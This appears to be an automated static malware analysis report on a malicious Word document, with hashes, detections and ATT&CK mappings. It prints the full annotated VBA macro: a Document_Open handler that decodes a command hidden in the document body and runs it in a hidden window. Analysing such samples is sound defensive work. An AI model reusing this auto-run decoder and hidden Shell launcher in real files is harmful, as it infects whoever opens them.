Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 043844ffe995867c…

MALICIOUS

Office (OLE)

144.4 KB Created: 2018-02-15 00:00:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: a2a8e01535c76739f4f0bb6850e8c263 SHA-1: aa7c5a559a655129ba5ca9ac58ecdd1028d1d857 SHA-256: 043844ffe995867cff151320756cf4e51e445bc6b99061e8c7a522d0cd085b59
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file contains VBA macros in the ThisDocument module, including a Document_Open handler that runs automatically when the document is opened with macros enabled (a Workbook_Open handler is also present, but in a Word document it is unlikely to be raised). Document_Open calls H_OF, which reads the saved document's own bytes from disk, takes the text after the second occurrence of a fixed hex marker, decodes it (hex pairs, then 17 subtracted from each byte) and executes the result with Shell using vbHide, i.e. in a hidden window. The many long hex-looking string literals assigned inside the event handlers are never referenced anywhere in the macro and appear to be padding/decoys; the real command is embedded in the document body outside the VBA stream. Whether that command downloads a second stage cannot be determined from the macro alone without decoding the embedded segment; the hidden Shell call together with the ClamAV detection is sufficient to classify the file as malicious.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0. Note the Xls. family prefix although the authoring application is Word: the signature most likely matches the macro content, which is shared across Office container types, rather than the container itself.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    x1:
        Shell Q_TVJ, vbHide
        GoTo x3
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
        Document_Open
    End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Option Explicit
    Sub Workbook_Open()
    Dim Q_XBC As String
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier found in ordinary Office files, not a contacted host; it should not be treated as a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8784 bytes
SHA-256: 004751a0670128be9c4066d85c1bcf66952353bb3bc58427c9d261e408323f95
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s). In this sample they are uppercase hexadecimal string literals assigned to variables that the decode routine never reads; the executed command is carved from the document body instead, so these blobs are best treated as padding/decoys rather than as the payload.
Preview script
First 1,000 lines of the extracted script
' Module header of the olevba-decoded VBA stream. VB_Name = "ThisDocument" is the
' Word document class module: Word raises Document_Open for it, while
' Workbook_Open (defined below) is an Excel event name and is not expected to fire here.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Forces explicit variable declaration; every variable below is Dim'd accordingly.
Option Explicit
' Excel-style auto-exec handler left in a Word module. In Word this event is not
' expected to be raised, so it is likely dead code; if it did run it would end by
' calling Document_Open, so the behaviour is the same either way.
' Every string literal assigned below is never read anywhere in this listing:
' they look like hex-digit padding/decoys meant to bloat the macro and trip
' "encoded blob" heuristics, not the payload. The real command is carved from the
' document body by H_OF.
Sub Workbook_Open()
Dim Q_XBC As String
Q_XBC = "505050501E508D507D1D451E8C5017505E50505050502050505050502D80257F506754507D37507A503D503462668850225450506350297C7D83382850778D50501B507850503850825058504E503B1C3D47503F5050508E8A445284505750507D50505050236C505012384050501D834150672"
Dim XN_R As String
XN_R = "4702750288850505065122F50502765728E5A502D3E505050665B5556782D265086501D50508750266D7150508250505050504D4B507B2A31503E50505048508251501A508B50505018503D50507C5050383F824B505050505059326D5039508241505025421F2560442650507250552B502150"
Dim HUN_D As String
HUN_D = "11172C77502150501C7C5A5E50505050292B321750507550505053502937823B507A378E505050501B7B50243B50505062505050508050446029505078326333502943731E2B50508E5072276150504450503250503B5650503E5032502850495050883F555023525050492E505C50505042505"
Dim UQ_B As String
UQ_B = "96E507480504550186C505A50293B6050506455826250885050405050507C6F5050505550255076504C4A372650503150114447503D50506C505050503F506B74503A508A50505047285073505E5A8A6A504939505050508B5836501F581C475050504B1F6980596250504350345D7731506650"
Dim XQJ_R As String
XQJ_R = "427A5042675070504950501C5C502E88504F5C505050286D50345060508F503150502050502050195050631750505060505062504E2A508E4D50505266502E5050136C4D505050505487402E15861E6E50486F5081501B3638508F2A451A4650235D505050505F2F50855050844F50135082505"
Dim N_Q As String
N_Q = "0505050506D502550505B5050509026507753505A5050501C505F7C44572678501B5034502237641B50501B50503F2F50501B793D5050361E50505050506882502450506C5050505068505B3F45315E57601B50657750505069505073688F505050295D507D7D508A505D2F50505E506B651878"
Dim XN_KEX As String
XN_KEX = "5038176E5042505842116D50752C5050505050502B50755050672D18138742501B505776844C4043785D50503E374350508B35396E141D5A504374553B3B505050506A3A50367750206465505050505035764850621A851750507E515050194E5F50507B50193B50248E291B504F5F4B5050315"
Dim YPI_OLA As String
YPI_OLA = "0508650505F645550503650355C279030503E502C4B508650507A67505044502B50535B50573C2C8A56505050503F707E501550761150505050505090506A195050227068505050385050505050484750505073478E37507F7E505050502966506D505050508950504A4F507050589050615050"
Dim DX_LD As String
DX_LD = "635D505042503C2A41735050503C33502A502A715050507F6C5036891777505C137550508D16506F7979565E5045507D508B50507D765050507F506D501B5039506A2150508A1350405050373F505050502A50505050508C427B501C5054771D50235050647B5037504D74514B1D50501F50215"
Dim SZ_ZG As String
SZ_ZG = "05D595050345050302B6E50503B5086503C8E5F8E285041504D1E6352506E50507E1C501C7137142E5A502F31903C3D50504850764668774150506C6C50505953505050505050685B71501E50502D5037505050375049507D508A45505050585B507C5083502B28508815775B50507546505033"
Dim WWR_YAH As String
WWR_YAH = "6A3050164750613450502D50635050501E5050578250507A5040505083505039505D4E7E64545050765B5089132B50505057505050505050506441505D4A3A3675505750691150503C50503A3D5048505850505D505050505035795050505B5F501B4C505050615C743E507B8B1F2D5169F2505"
Dim HV_YPZ As String
HV_YPZ = "0148550505033507650505060503D505C505050616B6D2C6432275C747D4A5081642118505043273E6350502C503B42501D3A50504A5C5069505050505060507C505035505D795050506E50505050506C50712150502A50717F685062675015663B343F76C950507E254D50506950508C50504F"
Dim TS_J As String
TS_J = "545050175250504E8750697450508F504E5060518B5050832684508050137D2750585C70182B5050405050505050545074508E505013721640627C5050504D505D506A8E2F5034506F2150505250412B1D5084395050564050505B27721250504E50506E55736B355050355079506150BD508A3"
Dim I_NHC As String
I_NHC = "519844850508550585050315050505750503C5F50507132525D50506750651A4129508737665050595350156750501B135031503B50262427505050505021502778507B50825056506050502D5050506450458F16508A74215019561D68433250503C874C7C503356884E756C5050505050507C64507217507D5050505050508F503F50748D50502C2249505F2518275021507D5050506650355050503E575055505050564150605271505075815050774A4F50505080505050146D50501B3F535C338D795015875050507C507B85505950"

    ' Hand off to the Word auto-exec handler, which in turn calls the decoder H_OF.
    Document_Open
End Sub
' Decoder/launcher stage. Reads the saved document's own bytes from disk, keeps the
' segment after the second occurrence of a fixed hex marker, decodes that segment
' (hex pair -> byte, then 17 subtracted) into a command line and runs it with Shell
' in a hidden window. The command therefore lives in the .doc body, not in the
' macro literals; to recover it for analysis, carve the bytes after the marker from
' the sample and apply the same decode offline.
Public Sub H_OF()
   Dim Q_TVJ As String
   Dim H_S As String
   Dim QPI_QHP As Long
    Dim CWF_QAZ As String
    Dim iFile As Integer: iFile = FreeFile
    ' Whole file read as a binary string; requires the document to exist on disk.
    Open ActiveDocument.FullName For Binary As #iFile
        ' Marker is hex for the ASCII string "1VIWJIUCAVQVXX1EZXP". Split(...)(2) is the
        ' text after its second occurrence (up to a third occurrence, if any).
        CWF_QAZ = Split(Input(LOF(iFile), iFile), "315649574A49554341565156585831455A5850")(2)
    Close #iFile
    ' Label-hopping is control-flow obfuscation only: x2 decodes, x1 executes, x3 exits.
    GoTo x2
x1:
    ' vbHide: the spawned process gets no visible window.
    Shell Q_TVJ, vbHide
    GoTo x3
x3:
    Exit Sub
x2:
   For QPI_QHP = 1 To Len(CWF_QAZ) Step 2
        ' Two hex digits -> one byte ("&H" prefix makes Chr parse the pair as hex),
        ' then a fixed offset of -17 recovers the plaintext character.
        H_S = Chr("&H" & Mid(CWF_QAZ, QPI_QHP, 2))
        Q_TVJ = Q_TVJ & Chr(Asc(H_S) - 17)
   Next
   GoTo x1
End Sub
' Word auto-exec entry point: runs when the document is opened with macros enabled.
' The 13 string literals assigned below are never read anywhere in this listing and
' look like hex-digit padding/decoys; the only effective statement is the final call
' to H_OF, which decodes and executes the command embedded in the document body.
Public Sub Document_Open()
Dim GGV_U As String
GGV_U = "3D764950505058503F8D50856150506E6650507B6227177A5045115050491F2E715F502C5050508062505050801D3A5050862250505037266F5050508050507F5025137950506F3A412A50836650501C5F6150386F5050388050503D225050535050385A505050678683501950258B502F895020505350505050432850492550"
Dim HA_LVJ As String
HA_LVJ = "242650501690508450516D50505029501150365044505E6150507F504E6F50505066505050506B475050363D55502B505086505050341950505050507B5030675051501185358B5050505039355050785028507F5026505E1150505078503950504F505068503B62856C50504A7F502427508D826850508511503D5030422719"
Dim SQI_KGN As String
SQI_KGN = "6A501F4D207E5088505044502550565050605080505F501550905035504C505041255015508D1F5050505F8650717F69584454507050845042483D50716362775050508D50507051435050117827502145508550507E5050255061313550505050158E507885503D198B50503250503C85507F508C5C501E2F1F301F136D2984"
Dim ORN_SJS As String
ORN_SJS = "23162F878711233E5250388F19505054502A508A51504227496A67502F172E8E681F50505050506C504B505018165078502550435050194E2D504D5033501A1150821350552B502E505F86744265507F501A2E5050355050885043305029435017643D7567505050884B6E501C50505016297C503350504350504A5050504754"
Dim W_MBW As String
W_MBW = "503B11501A604A61506C505B83227D2A516250505032505051435015501A5050152B5050507606502C5050505050713081501E478C50574A5C505046505050295668355063502F31506F2E508450855050506650502B5050701850506C785050502F502750493A6350745050573350508950505050505041875E673E30531C41"
Dim RVH_IH As String
RVH_IH = "5014505050502E814B7D5050292950504850505018508D5050505050437B6950AF2F56505050506429516E45824D506F6D77503E4D5027604C8518134134668B8552335029738C50758E545E81505B1C5078505050192A5050861D5062502D18505050504D505E503650506F501250505045508E8E50398740506650428C714C"
Dim GJ_PEL As String
GJ_PEL = "50503E5050782B6050564050505068506B5071504D50508E507650433E8A6D50507E17502938503F5050837F50505050425050115068504F381913802D505050523A505043506C50578D203950445050505050272759503050432250F0506D7F654050505052675050502950465050394E506D24505050242F505B5050506D50"
Dim CUW_DYR As String
CUW_DYR = "6F6E158850505050667E5050505084395C507350116C509450501C36375024507150483A50135030115050293360508A7A5013506C507E5017504058502F3C502354258150504450505050465050504F7D62585050505050505A505071855017504C88508950755050507B506B1A43505050595050505D50502050582F277850"
Dim IK_D As String
IK_D = "1C505050508050501D505045503F50505035505062505066317C50506B505053755045887E50508E744A50502A366350505050148D66502B507B198385503285505016507F6150502B5030878B32635057505050505050466E508B50461A50287784603050235050275046505050298E3C50508B505D50796A2250501A50508A"
Dim UY_II As String
UY_II = "6F2550137B5050855050664F7850502B72601B7F5050377E507C1250501D15503B5050262450505E8C505050115064507450506C50506050505028552E506170505043405D4D715050325040505050788F643B50387A4D745070501E506E475055663D3264288D8A505050816850506A2933506C375028505050505050F95050"
Dim Z_MMV As String
Z_MMV = "725050247750503A50501C5074495050507850253C505C5050423B50505057505020495086296C603B50298A5050431650192E508D71502C4716505050134D7E5080795050661B608750125044372650505050503A1C5C3C502E5F80506D7339505050374250908850502A50705050215050182517875450354D1D791850502B"
Dim FHI_R As String
FHI_R = "73505850875077676850506C505050454E9050665E321C77501350278073165065508A71501250505050505050825945502C4E5025504C3250508250522576675050565A508E505050506E8F3983505C5057504A51504F4F272533508D7E595050613D5070375056315029506B8B50876F7F2F505050871C50507A5025412550"
Dim O_YEB As String
O_YEB = "6232685D509050502A50507150505044892E503A142E6250505046807B8050501A6A503A5050871C505350505050504E5042505044506A50508423505D505051505F522150508E1F5059505076503D895050505050503519135050505024252F501550324850505021502F1E55505028502750508E2D19505050291546505050504D5050505030505A504E50507F32506B5052506D83502A50503B5050503B85468B572350234A50506F50502F505A2E503B5079127E50398D3150502E50502386504B391F685872"

    ' The actual malicious action: decode the embedded command and Shell it hidden.
    H_OF
End Sub